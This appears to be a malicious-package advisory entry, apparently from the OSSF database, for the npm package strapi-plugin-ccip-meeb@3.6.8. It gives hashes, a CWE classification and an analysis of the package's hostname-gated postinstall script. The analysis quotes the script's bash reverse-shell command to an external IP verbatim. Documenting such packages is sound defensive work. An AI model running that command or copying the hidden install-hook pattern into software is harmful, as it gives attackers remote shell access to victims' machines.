-= Per source details. Do not edit below this line.=-
strapi-plugin-ccip-meeb@3.6.8 declares scripts.postinstall = 'node postinstall.js', so postinstall.js runs automatically on npm install. The script imports child_process and checks os.hostname() against a hardcoded value ('ubuntu-fc-uvm'); when the hostname matches, it executes bash -c "bash -i >& /dev/tcp/14.225.210.85/80 0>&1", opening an interactive reverse shell from the installer's host to 14.225.210.85:80. The hostname gate causes the payload to remain dormant on unrelated hosts and fire only in the attacker's expected target environment, a targeting/sandbox-evasion pattern. The package name mimics a legitimate Strapi plugin scope but the shipped code has no plugin functionality consistent with that name; the postinstall reverse shell is the substantive behavior.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020098",
"import_time": "2026-09-16T14:19:37.777374135Z",
"modified_time": "2026-09-16T13:58:20Z",
"sha256": "fbf7a24da69c80ba7475efcb12c97f1be8b4ebbed42b47131ac9716ff38d5620",
"source": "amazon-inspector",
"versions": [
"3.6.8"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "postinstall.js",
"sha256": "59958a5b6cf205abf8e3c05e62d883c008dafcd91abe907dda3d0f2bdb95a5a2",
"tlsh": "ef411eed05bf2b3962338ce9522b8097d52741023516d278b5dc8b43bfc4d9ac631afa"
}
],
"package_integrity": [
{
"filename": "strapi-plugin-ccip-meeb-3.6.8.tgz",
"hashes": {
"sha1": "008c35dc2a1661ec689d7fd16960b7558476b204",
"sha512_sri": "sha512-fXMnw1swkqWeky07GJYXghKawxBe2BF+ueYz7+FEtd+g9GvknJVCPjBrO2FMmGKBdKo3wmtKsdQIt0+8i920AA=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-ccip-meeb/MAL-2026-16226.json"